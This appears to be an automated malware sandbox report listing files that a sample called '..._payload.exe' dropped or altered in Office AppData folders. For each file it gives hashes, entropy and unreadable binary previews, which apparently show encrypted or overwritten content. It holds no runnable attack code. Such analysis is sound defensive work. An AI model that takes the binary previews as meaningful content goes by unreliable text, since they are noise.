                                                                                                      Preview:.PNG.I.D...sC....q`F.Tp.B..~._j..vYQ_..~f......>....{;.z.K.@U....;.......F...A...+.q...C`b..Z...]$.r.G......Hc.!..".G.i&5.:.a....._.w...?..g.......&.o2..d.3..K...."V..k..d$e..G..........`q..pD....$..6....I....g.E8K.B5....&.!....yv)...K_..{...../.E......T.:..l....2K3N.G..gc...........U......r....n...m<zx.H.;.P.......,...P.$.G...v.U<.s%K../.N<Q.G^..f.D....S......jq+lA.....{9.^.a..9.X.W.[$HX._G...$W..#z<....;G,C.8.0.!K.r....I...Dm..A;..u.G..m+U.....6..c....@..'F..5..>.....|.y.d....%y.....r\!...a...I55..G.b.wSY9.x=....#Sr.K@.51..q.........nT..k$q.nhE..B.....4.1.....mY.^Z.d2..V..:..5N.y....dQa0>].b......r...K.N.D.2......3:..c.."..%g...A.HA1...hUW..`.KL..j..!.r..<.,..=.K.....,.S....1.uu..m..0...F.0.3L._.Pd&<E_>....Vm.NeT...N.e.0.......I.<O..nx...........[.w.c.b...........m.`\....R.YU]...D..,...+L..h!.`.....4.hU..F(.l)T.m...0.h...|....i2...j..,q.&.._d....p......R..).R...];bg..8..........W...Z]....0.'.s^}.%F...W......9X........Z.S.jf.b....I.........ev'.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7D2AAE1F-E21C-4042-8EAB-08D27101C10B}mt11414620.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8887
                                                                                                      Entropy (8bit):7.9798801257351935
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:24yNXCPBMEBbPFawXNkXKInRfaZ7ZVSFdPD9W+C3ZLOKvQPg0q:24qyPBfFNXiXKInm1V+DOJLFQPgB
                                                                                                      MD5:2483035B8F684394E0EA4C5067A6817E
                                                                                                      SHA1:2F1063E03D1C239416A150EFFA8E66BA01C93376
                                                                                                      SHA-256:CE1832494FF21B41BE1651E580D10D9BC0FA90A83A5B7C7ED5775D18866372E0
                                                                                                      SHA-512:5E7A072B0F117918DB0B5A80AB999B9AA7DBD30D9269788962F6B3022533418FD4B9A0E3D81E9587E4B1E200935EE72C1DC43783A0A416A670A292B1322AF855
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG............)W......k..@.=..Pz.R0...9U.....R..T4.K.K.......(%../...}...,UMf>.";^.~.f,GM....r..X.}.!.VR.c.z....c<....&.U.0.T.[.*M"3K.s..j~r|O(......O..8...M<.c.y...Y.......)|..^N7C.3..\&...D.u3~@wC.f)..[.4..iG..z.ti.B....O.@".Y?....sLL.$^.7../.MA.....VT.u...Wt.%.<..f J......B..?.zF_...N.N.Y.......P.z...y:..co....n..!....I.<<..8Y.)...72.H....@....&(5.../"P.0#...u.i:....v..5...Ec...."..=..[..%)h..~b.....s...OC./z..h.St}%..?0.U.3j2...F_."S..X.T.AV....1....h...{&.!.H....q....8.rJ.5.....$.f%.._...D......d..9..x..&....$.y:.}/.b.k....y.Sn/..."#.fWM..2.J.]........yz*.....<....HX2..k^.:..z.e.`_.^.'....."[..FO..qs....X....3.q..+..<.m.1uG..`}.w?.I.z../..bv.|T%r.B.I.WR.B+..$.K.....E.H.E..c.....%.'G......yy..@.&)..~J.s.X..w..$).$o..;../...k....$.-#.(....a8C...71...~.]g+.)4^+.~9U.....Z'z..J.#.2Z.Q..Fz#x.nOcZF.o.....4.I...........#.....*.....t..+Y..k$.m.X...s2!.q<./......8._gE.W.........^&..:.......J$G=....',...|..8C..v.y..d....oZZ.7...Zg..;..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{967E9DC2-54C6-4D72-9409-715F9A3F61E5}mt11829122.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14457
                                                                                                      Entropy (8bit):7.986321653026458
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:u5KXUtJ6EJmenxt+NFmh+R+GJDJqmC2MEhsjigNb59hEInWCK8DDUu60a9TX05jr:ugIfm+GJbbhoisJELJ8DDkB0hcP2
                                                                                                      MD5:FC18D494A1105825FEA5730DAC886DA2
                                                                                                      SHA1:58098240AE05021814938DABCF429A5D19C18DA7
                                                                                                      SHA-256:31C031B9C0BFBFD1942057D60AB8C2783B35FE79E4D994D963C1E34DFC049E25
                                                                                                      SHA-512:FE6441F2EC51494D801DF2879B0FAD542E880C257C5A0545C3DF18AB9679129EFAE84BE7FFFD36B875ACBE3CD0B9D913A261B336FB5425DC64EB80FB984A8868
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.'...zN...>VX.._. 3.....r..n-...4.+un.....?....r.g.+'Y.H.....V.$...=....a....;..g,..7.U.8.q7kSK2....c.<|..%K.i9w.S. \..cj..0"0t/.G...4$.y.n..7.hm.-!........M+.f..2.<&.E...|..-...N.,.'....S.l.x.P|I.W..&~g....$..ox...Bh...87.i..l..Rf...........2.n.?@..)....%.b.OtNXi.3M.cIx.4.......=....`..7.X.....W?,.8G..E.^..........]4.Q..`.5.T...-..gf......].m.......O...1-kl.M.V.(..Z.EU.....R.......dq....l.+.../..+.r..V.8/.n..^n.t...M....?.z...E......b%.B...?u.O6=.'.1i2:..v.)mt.K@.Q.T.t.h.....n.........._n.uf.Z.. .@q.,4...#....@...........(W.R/.\...|.;.n..cz.`..n._!..O.......k...,rxc..5.F.f..=....+.....m/A6..`.....\..G..9\..^IL..$.F....4..lv.z......I.Z.bD.t.......k........*.V/ .9.O~..n.!. ....?....[1.@..P..+|.tfU..f...A..^Nf...w..s...Y.....g..Z.....K9Z....>...[.?s.ih....w{b'.j...l*...;.....@EW..L&...i...X.~B..].........^.. ..[.......l.G.|.Z!EE.WB..O..(.p.fcx1n..8..j#..T.p.....s%g..AN.?.}.b..D..w..~...?yj..%...f..A.d.L.B. ..>..<]g.w..!.&.CP.`.......}O...z...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{A4858C46-92BF-4775-ADF9-F93EB4C5F636}mt66963475.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7986
                                                                                                      Entropy (8bit):7.977805100700446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:WP2i9EYyixc4Z7enYFqmIYdpn/7GBFnD2kO32GDOPRx:WPKY5teQIsp/74DKgJx
                                                                                                      MD5:F999BC232BB3D314B0FD0BB1C953FF05
                                                                                                      SHA1:F6A655E4C7A9EC68692CA20978A4CC49D5FC22C3
                                                                                                      SHA-256:433A31EB26E9B0D08CB827B4DD855D92262EA17D12504B7A06AFD1457091B6F3
                                                                                                      SHA-512:703893E1CE092F22FB1E37011B28DB7AC5831A13FF2D8949D4CD4DFA00251D663689A59E15F38BD7F7964AB9B3A3A9F7E0D1FD90A0398A38CAD8902A46448511
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG../.gQ.!.`.....r-..3!..!..&.# .2........',vm......N~E3).%D.?.*.m..cy.e.'&ii...S,F8.HG....W...f...c.?.......A...U..z......\.........dNk...h.....:@v.~.......aF.5....2...jt0.On"........|....Bu......o<....(jVm...&.DS...md.Jq.....C*...i...c..#..M.....X.....+rcw.~..:>......x.#*_.+...2d...1>O UG...c.+.l.U7uY.......C.P51.Zw..?........Bt.[.......}{.`uxj{7.>k.....9.8.]7R.?F"x..n..6......$fz...H.z..4<.p.[..l.$a..`.....[.@.A./.7._.t.up..#.1.;.....!A...F....<.I?..z...(....q..2r..|v.LO....#.La......+...$oG.k.27.}"......K.:.w..7..,.y..U..*v.]..d..>.m..<u|{&...#.$2.....!!..J..(m5v..2_v.....O...nM@y.~.....jL".`.T..kw.~..X..S..x...Q_t*y.\+..a..e..VF.....U.+.$.DLXAq...,.M...1..j....R.r..N.n.t2.\........[..w...!....^.O.*.....]=H4....9.i.qq.X....f.....................F......:..+;.V%Qw.s....p....t..#Z.7e...._.=..../B Z..@..=..:.'..E!o9...T\...[*'..........ty...,.....sa...g..#.....p>9$.].......T}..3,.W...r.~..)i.3.+7..\..}.q=.......G..w}.W8k...4.nu

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{AA4547C7-FE83-48AB-9053-3A60F16A4C34}mt10000137.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5293
                                                                                                      Entropy (8bit):7.968631921451226
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:VsSjUKK+9Zo2bWZdTWCKr7XBVlSbinuIviZmzcFLFWJb3NcoLLbMA1wD:CuUK/024dTWCqrBVlSWnuI6UzipWbMD
                                                                                                      MD5:6650DDF0292089D8D45CFA406CF8A684
                                                                                                      SHA1:40612EE9C7E323094D01716BAA1849285661718D
                                                                                                      SHA-256:E859E41283E0D87AEE2EA5E98F0AE820238CFCEE72DC3276F4E97C86FC558FA7
                                                                                                      SHA-512:3BC6B61AB5E8F660BDB7B303E3EB0969314EDE9F5991343F5F2D42560DF68403995DC4C30CF922065BE431F76D9EAF4FB87F3C1F6E6D7656EE7FA0B80B6B0E33
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..w.....x.....@y.(...0.w....)...JVX.:S..M.>.).?i..\...[.P.5.5.{.8f6.....:..8..o.".z.....P..4d.S-P..&\r...........x...()2_;a..#U.... ...+M....\.wq.~.7.ol.r7].G.z....B1.Msh?*._4.TB.-)&H......}...r..7.E.{3..Z...O\[.r...$]'...a.U..(d.*..f.W...-.....|.'u.W.....*....0.H.W...4."1k......P7....L..."*..lK+.....0 ..|..Y..~..q..>i...s...+U'.......lA}9Zs.A.D.<.B$.?...Q4.W....|..'....wsaJ.E^. ....D.5.S..\....4."4.).ot....z...v@.xR&4.....J..^x..).(..^7..Fa{./...6...h%...T>.Nb".*.C.`...,...n.C.._@X...L.......9`U..J{5..iq....hnn[c....1X....$..t.>...c.xa...Ey.......k:@...RpBb.(=b.t..9.n..X.d.gb!..Y.rg.A'...=j.!...Y%...w6..W.Db.`h.9..=+.vz..](.u..O^..?Nh....(...~..a.jK...A...t...m....1.^....!..S....G.C.a+J.K03\~E{\....x#...`fX..e$...]..7..?.....$I......D.Z.....!9..j.....O2..>.;,\..D......\C..*.-...{...q..p(.J..%W...i$..}\ms...f.15.B...$.z....g.`..\'...3N..uf.|.<q........a.N>8D.++.S..Qr.V....=._..p ....:.|.......X'....PB"r.Z..#4~...O/I.9Y.p.r.....n..\.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{F5FB5847-D24A-455C-A647-40C253091672}mt67739505.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9080
                                                                                                      Entropy (8bit):7.982185651274793
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:eWNglzLnybSphPZhq//E/WFa3a4IYmzDTN6s4fWF:7gzLnymzPK3E/V3nINTN6fWF
                                                                                                      MD5:B064F61BE747C2A5E74CE89B648F934B
                                                                                                      SHA1:7F0411D785CB2642CB521A7302536CC93AEC7F57
                                                                                                      SHA-256:238DD6471D77ADD63C027CEC7B42E8364189541FE32A241F36EFC82A8C0673A2
                                                                                                      SHA-512:7C3B7A4D1093340679271519E0513EB873DDE65F2997C186B58B1599280C637D9FC2E60F28099E653618FC9689F93FDAC33FB3E853542ADCC66A6A6D06309714
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.;...:S..L...[.|X......3..M......ZOx....S?.7......@w=....T.V.;...P...7..-U..f/..Z......86....'9c4E.N.`p..<d....z.%.Y|.....Jw...*L..5...d.....K.kU.".........GU...5.....<......c..!._..>`8.$.=8R&G..\b........... m.V...Z.).M../.=Z.T..7....M{d0....?:.....g..HIg....\XHC...2.=BV.*..Lv.E..V:G..9..h.y.o.H.<.4C.h.I.d=....>....A....]T*..W.r.k.:).Y.Z%0..F...B..mJ..ZY....}.B.j5...O..q..4....<....j}.\F2J6..[.Z..[.&.a.&.p.=.ey..-&M.S.@V.4.I.....h8`z.....i..&1..w...7....v..Tm....c{4...3.ipu..yd.......30.[;P..._..rd.5.....r.j=T.a.9].>.A........#.j.2.]...z..../K!p.[OZ..JX#a.'..*Q.uX>f......../q.Q..Z+CH.p....PO..z.qW..7/.].G...:...bg....pn..........u}.PB.r.`.....L./=.K.L.;...!.<.-...1.s...B=....n.Y.a....?q.|.u.._td...y.i......%).B!..]g.a.l..I=..a...^]Q3......^.@.......;..uf..j.V..3..1........'.r....!...........d.l.u+.N...c....-g..J..5.v..I....{O....%..&d.&..N.......N.l9.1....E..<sG....p_.x..M..#G.}.L6..#.....=~`.D..p.T....o.7^...@.4....DT....z..ZF.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{FD5FD857-5A38-4C81-A322-3226BB279FAA}mt45299826.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9025
                                                                                                      Entropy (8bit):7.9830358241132675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:bgHroiia6WmISdxozWbESuV1PcC73upl1CewlSnIoMqvOQN4Iy5:btAkdxozWbESE1Pl7+pl13iqMqvvHw
                                                                                                      MD5:5954A2D2C54391A44E55C006D5B74B5A
                                                                                                      SHA1:74F2B208CF493E13BA2A90D742000B688EB2A2BC
                                                                                                      SHA-256:F2DDD9554F30D44B885BDC30BD5A28FF11FB88ECB07030A61C47CB8A05C65417
                                                                                                      SHA-512:70D32BE8C0227CC7EF780236E5374DEC08F5EFA3A99F918357A9288A7AFCEF90B5D306A52FBAF13ED10FDA47F15DCAE3BC44FF806D3927E87161C5EF921907F5
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.N.....N..Mt:qL'....W.}.I..4G.Nx...g.T_..QO'.KRG...>4.s.@r......t~....b_......~X.'..dk.....;D<.p.n...........)...h z.}.BG.....$.............0.....,..Sx.......cygD..o$..p.XB...k...|l...:...M.RV...I....O6.y9..ysF.....hU.-..Y..[.X....brA.R.Yc5.......r.o....DjU..h.6...x......=v.g.....a..=N..:.q..^..sz.c.......W,.f....,.......bqhgy.=..7.;....BO1..i(..[.{..hN~e....i.\.M...b}..f..j=..A.#..P..V$.i.....;[`}........^<.....w.........s.G@d4.x.f....;!vI......../...num..!H..fN.....aP..s}.|:.+p.c...u,._..W....c#.........I.2.e`..?r........`....l.R.Q........"..c...Vy.V..&..-....G..y....W.d...b......G....=`.......q.!W...K....i.{ {=....N....2.o)....]. Dv.l....V9=.N7.qZ.R..^.v....@'F.7I...29........5W3U.........|..].%.K...*......!...l....i..OC.]r.Q\-.Z...0XK.Y..k.f.a....J.s..&V=h.[.%..es.w..x...~..g.*.S...L......[.\^4.].x7W..3.c.e.k2{C>.!03...o|O.:...8..0.m..)J>H....J....`..........#....5...V.......k..B.2......~..r...L..;#..]9....../.f...%.6.r...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):208087
                                                                                                      Entropy (8bit):7.724209283101433
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:DeMNvYb4w+QATIAVMw/zf/IuMcZ0Xw4R6t/7fBf/yX6X4C+M:6MNvE4w+RTNVTTIuB54RWt/yXS4g
                                                                                                      MD5:71D2F9570952CCA65457DE9A60FAC959
                                                                                                      SHA1:B72FCA98C084BF7F131DE32D00C5278B97B63FBD
                                                                                                      SHA-256:FA60829EDFC95CF955F7A72E853786C201B1678A897A10B8F401597F478EBC51
                                                                                                      SHA-512:D219FB7262A3CFAE58914D9CC99E1618D27131650F0C7E5BD176F9424EEEA74D96FD7E51BA478D043DD5F214A69F14375BD60454ADDD8513A6BDA78A3E91638C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.TFB......K....;%..|...<p%.-y9..T.-R.....CY....GvT.......C.*.ox)w.NU..._.r.tC.ubM..e.+.a84...7..:Z...Y~..b+.....a.&....:.:B.|l\......../u.@....X...{:{vz..D`..LIR..&Uv.!]/..'..K..U:>9q.!R.d"....|"9.\...UAY.h.>.}..D...9...$.UT../.9.*z.?L..jRI........j..?.^.4.$.n.)..tu.8.%'R|I....b@C..O|...".9.$....`.(*$.....XCJ..^...u>]....[..<.....#.w.X.....O..2.....:..+B.....9.|&..A....)...*.....t...e..KX...].1p.e |1....%...^.E.:$.............. ..H.H..(........P....S(...C. ..2.T(..si....GG,...@}L... ...S.Um%Nw..._...\..V..=.K.'a}...-.........A...Unw.}...U....i.h.-X..t4X.[t>]..L...5....cy....5.6.4.$.......).4..Z..(+..'..x=..).......C20.<PY?..g.m.0....8.Kk.w.....NH...../.B._..$...%N1.zv5xI.#.Bi...f.U{.......O.e.%....0..G............W'.]Nin.=:.D...s...,.U.J..(^@.].gb..M%....}f.w.B..=>5w.=.>.c....Z}.Q.N.q]-.t....w.b.}3&...K.h.ZM.#....:C.i.>..w...{"Q........E........t<.@-.-H..%..ZW+.....F...GT....h..$...A0....v..$/.N.y.. ........q..)...T..........].

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100130v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):819
                                                                                                      Entropy (8bit):7.733121989397723
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ruJOiuKSxkOamc/gzC9gL7l86aOB1vnda0rnpFoC6zB1v6bD:qlrikOakWgL7HaMznh6jwD
                                                                                                      MD5:FBF8C305724749F6EA973EB854170FDC
                                                                                                      SHA1:F3D6057CA4F106B9890F1E85811078A9567D2366
                                                                                                      SHA-256:BF32C2B1667C2644A208DDB49618962257F809C50B3401052CB110665D981EE9
                                                                                                      SHA-512:B977A8E95D72FD849CEEC0727A6A1C2506E735B98E239D369F349334A7A9A2471436F81F31A393B39E3CBFC44905D7E18D735101BD92BDD3C49178CF7F729C72
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml8/.....G.[..A....46$)...z...Qz`.....v..<....V.......7...(.'.).WgLd.+B.a..HY..*...."$....(..Lg...#.vV./n;...q+.C.nG\.....r.G/..9$.@.@....,={.o.u.E.0.d.B...z.!..1..;.Tm...t..x.X..0..#$..!s.2..-L.^tjN.0...B..u...c..+....9+..c.J............../....u.1...T..x7...|.\.8....3....`........., .>.D..[..N..8....MKX..R...5.w.E.k"..D...f.#..w..D..J.....G.,]..Dk.H.4..|u.k$..Keq..g...z.`...,...+.}.Gu=B...*]...^@q....E.0:.K.....l.UIP....=....W./..........;....o..h....6..E...s.i.~..-+.m.`..s`+..gWI.$+.I.{(..n..HO..5t.u..&.X/..Yz.u..6,......(`...U...j=.^0.>...Q.04.........V.m.\.....>..Wg.G."...0...9y...<].D._..fy..ac._f.....Q.'....a.4.N.q,U...Y.........5."DQ..$~Mrg.4g.K..I.y\...g....5y..v......[.i-....QhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100131v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):747
                                                                                                      Entropy (8bit):7.6923149510501005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:zLbQMucboeWc1zZvoI/BVCyQeY7qFIXurT20DweDyh74CM9VLsON8Q/iaZv6ciik:zLUMT0eWc1ztoIZV/QhgXv1sibQOdv6X
                                                                                                      MD5:F3E0269DEEF84CD96088991905193145
                                                                                                      SHA1:C359EA30D53F0B9C5E8A419156550F1D8CC2C93B
                                                                                                      SHA-256:AF497F7F969BE8705910BAA42ED8F8383389D36A8A72D6E6BC8DCB8CA3F42E40
                                                                                                      SHA-512:7482B12A1C27B34CA1B8C228C0496DFBB8D6480CD2AD04EF11B0C567463C9C1658F773DA88126969BB85AF7DADF930C291105968E762D14985C68C87E179EC31
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml8@....-..4..v.t..'p.u{......|.D.5.N...Kf.......#^..vM.b..Te...0(..\...P.d1....fe...a}...T^.1...C.../$U...*.&oz..<...w.Q...D8..:....,.]N.......W....e.A...Jx.F...]\....-ZFu.O..._.j....w.#.R.......E//...=...x.z!..E.~...#.)..r.V..i]..{LU..0fi.....7.@."iY5.|.|.M.....H..z..........4.\.d.y.9T....zFzS8p......S.F..9..bk.d@26.~..g..aRnc..:..|/.dL....G...%...u......}..]8.c.6.;..M~.)K.v2e.>.....).r`h. S%Ed........N.........M.g6......tDX.#...._m.8...J..+.l..../y]..|.<r...?.Y8>...z..6.N......E.op=6./.3....l...%.v.M.|iE.d.:..W...}.{.;.Y.....+....w...m....W.Z..)V}ii.O4.......%.|...\u......g..P.I.9yIAu.......-2....=....M|.}.G....c..A.{..$.xhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100132v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):764
                                                                                                      Entropy (8bit):7.691629077869325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sNa9bweOwtY1rHOEh4JdPRaShqxxVgJRV702SSFpSMrBFM4xlN4P+rIgQ3K7uv6X:+0MeOd1r7cpaShAxVgV0QpSABF3N4QJ/
                                                                                                      MD5:B759981EE721D8D390E87494CF395F99
                                                                                                      SHA1:926008324A64CA4EA9862927B18EED60B665D3AC
                                                                                                      SHA-256:3990AEB3A06DE46FFC357FAA674E9B831CB5167065F1A8EF0DD9A431B7E5C5DB
                                                                                                      SHA-512:A136057755CFD83A8A7C41AFAED93D787CF3B1FA50F3A258CB6BEE4B8EEE9D9B5CAE6FDCFC74EE823A7DB4D6678AFA13310B4CDEC5927D31ED41B828BB89E5C2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlQt.[?...jbO......L]...J.....r......>..;<.Y(O..(.".g........~U...bbz7..%.:.&...&q.Q%`.$.5.....@Q.8a.`..9....\K..{.9...na...=...ffI..j.w?.q$.I..&...Y... ..vI.t......iU...I.?.i..X..!p.b8..:.n5...?.).....9w.A.o.f..<..Ll.C.x...TI. ..l..d..H..h.Y...^.I.J$.V....<.0............h.G......t4.....L..*...!.[.....b..f..d[..*.P24.6{..E.....q. T.,&>X.g.j.].p.O.q.i..>...[}..MY.K.T.)...3...[M.!WJ.d.Kw..~$......W...^..Y.b.%....6=....q.F.o..h..<._.....H..1...:_..Q..{........ZSu+C.h.a.......:F.].....Q..Y>.:=.<_..?.n./..F.Y2..K....&....<.........&.~..4w..>...xZ.%(...P.x.Sl.[.6.....*.v.8..?"h....Y.u....A...y....Eq.C.QP.Z.br...E&".<.c..s.........<5....U...].1h......z}E.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100133v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):751
                                                                                                      Entropy (8bit):7.714727877920514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:UfRBJXzeZQM3VY0y5HyqxH9CV2ha5zrzu50+ZMz++IRmPzV0RgYTgiVs66v6ciik:UZnSZQMFKxH9CGa9ryTDRicJ666v6bD
                                                                                                      MD5:118C626CEB27F83A3A81BC8FE0F2F2B9
                                                                                                      SHA1:4AA4D25AE3D809D1019B1A3848E570E2ADC7EB2B
                                                                                                      SHA-256:36132F305B5ED7D1B0A30D360A5AF1A3C5F4432A8094B6B9CA33BA0477848BE5
                                                                                                      SHA-512:647ED1EA4FF336ACE9CC53EC993524111FFA483F5E9BBA7A4CC1A9E340EBA49B2D8B46D00C828C73F9B85463D561C8670C5954CCA4A5F1DB29391B0895AA9143
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....)..ID,.N.xV]<...@%~.Q...pw}W....{t...../...3m...i....Z (...Q..g(.........A.~N.Ca...A....+.)........z......>.uH5.j.Bi.?.P...J...d..s.^..w^.....0.A.h...E....j...?Z%hR..:$..-.Qqc...D0}...+J.j.....k...h.....`..Ai...K.=T..~S.5`..V.XNM.L.S|...X{.d(....[...a.1......l..&.}^...aS.p.Z.U..Yj)....Y...........V Z=.yg.q7tA.y....!...~5.z.{.y.6K.z...wZ....B.......J...z...|?v_<b....T...&..{.?..*/.|.2."wf.........{...G...>4.?.,?|?...."...^..B..J'..0\...0.;.d`0....x...v....d4.,....L7..-..M...%a9.cg/-.SyK..ye.--.bz^M!...wG7.uv..s.w6l....1{....c...!Hw.B..}......;...>.......5.)..08...Wi.....B...8..W@...w....[9r.z....<..e...R...Y....u.0....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100134v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.707652223509887
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:k6sK8vT9oSLWlZipfk7ew080zFg/wnQfDRYTolm1ckYv4W05IK49330BKxmjNv6X:QvT9DWDipM7s8o8gQCTX1ckYvzDKy0YH
                                                                                                      MD5:38F7BC44F55E9EB50E3453593ABC39E1
                                                                                                      SHA1:8D76B50E77C81F3FEC85F1F05087261C1675ECD5
                                                                                                      SHA-256:C5063E3D750FCD39F99D44F3E8F8597A7C13AADA7EEC2E5228B558880903FD5D
                                                                                                      SHA-512:45855841816F26C2BBE841DC62B4B8868F453824C77B92A3DD5FC3863882ECD19A315149FBD8F3FB53DCD295AD94908E210480ED78F327A30BBBC527640679A2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Q`C.g......`.....cy....+J#.B...G...U....J.D..q.....Y.B.......No............p.....ef.Hp...P.!..MI.........}.[..}.....KD....4V...c4.h.....3.+z....(&JY..a..W.B..?...gc..YT.....u...o../s...."5...C.DK.40.P..U..$..p..yF>E.H|..tUjH..J.4W.K!.....^.p...sL.a.u......fQ...H[.p+-......A.G.S...u&..x....X..<..J.....u..(......%..Acuf.v1..y....I...W....u...S.V....l."zw..$...U%mM..H...m..b.%.U...A...bPq...Fr..B...'\O........QJ..,......8,....=(+.r.z..mgt...9.....q........W.l..*...oL.(Z.wb0nC......>.&.....(....RV.U.<.I...............r...?KX.....#......%...C..d...5......w....4...{...#...%$2t"........Z..Y..&.E.i...q..E..S%...1.......}/.E...z...[...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100201v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):743
                                                                                                      Entropy (8bit):7.68277173584632
                                                                                                      Encrypted:false
